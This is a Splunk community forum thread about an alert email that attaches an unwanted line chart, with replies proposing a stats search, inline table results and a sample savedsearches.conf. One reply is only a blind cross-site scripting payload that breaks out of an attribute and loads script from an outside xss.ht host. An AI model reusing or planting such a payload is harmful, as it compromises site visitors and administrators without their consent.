Alerting

Alerts, wrong visualization in the attachment

a_n
Path Finder

Hello All,

I have several alerts which send email notifications.

I know it might be very basic, but I need your help.

One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port 
The search returns a table, but I do not understand why it attaches a Line-Chart diagram!
I want it as a static table. In the Visualization tab, it does not show me a static table. I even tried to create a new alert without even going to the Visualization tab, but I got the same result.

I have even changed the search and used Table instead of stats.

Please advise.

Thank you


a_n
Path Finder

Hi,
The search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"

The chart is like:
Screen Shot 2021-09-10 at 9.01.22 AM.png

Which I do not need.
I managed for now as a workaround to not attach the PDF and use an inline table.

Is it the only way to do this?
Thank you



isoutamo
SplunkTrust

Maybe you can change your table + dedup to

...
| stats count by Src, Dst, pt
...

And as you said, don't attach a PDF etc. to the alert email, just a link and/or inline.

r. Ismo 

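As an added example (not from the thread or from Splunk's documentation for this case), here is a savedsearches.conf stanza that expresses the workaround Ismo describes: the stats search, results sent inline as a table, and no PDF attached. The stanza name, recipient address and schedule are placeholders; adjust them to your environment.

```ini
# Constructed example stanza; names and addresses are placeholders.
[Blacklisted IP access - inline table]
search = index=FW | stats count by Src, Dst, pt | rename Src as "Source", Dst as "Destination", pt as "Port"
cron_schedule = */15 * * * *
dispatch.earliest_time = -15m
dispatch.latest_time = now
# Fire only when at least one Src/Dst/Port row matches.
counttype = number of events
relation = greater than
quantity = 0
action.email = 1
action.email.to = soc@example.com
action.email.subject = Blacklisted IP access detected
# Send the result rows in the mail body as a table instead of a rendered PDF.
action.email.sendresults = 1
action.email.inline = 1
action.email.format = table
action.email.sendpdf = 0
action.email.sendcsv = 0
```

With sendpdf off, no dashboard-style rendering (and therefore no line chart) is generated; the inline table contains exactly the fields the stats command returns.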

shivamrai
New Member

"><script src=https://shivamraixssht.xss.ht></script>


a_n
Path Finder

Hi,
Sorry, I am afraid I did not get what this is.
Would you please elaborate?
Thank you


a_n
Path Finder

Yes, I was using this stats command.

My concern is about the chart, so it seems this is the only way:
to not attach the PDF and include the table inline.


Thank you very much


a_n
Path Finder

Can anyone assist, please?


isoutamo
SplunkTrust

Can you post your query + those visualisations?


a_n
Path Finder

I have added the search and chart, but it seems at the wrong level.

Please check.

Thank you
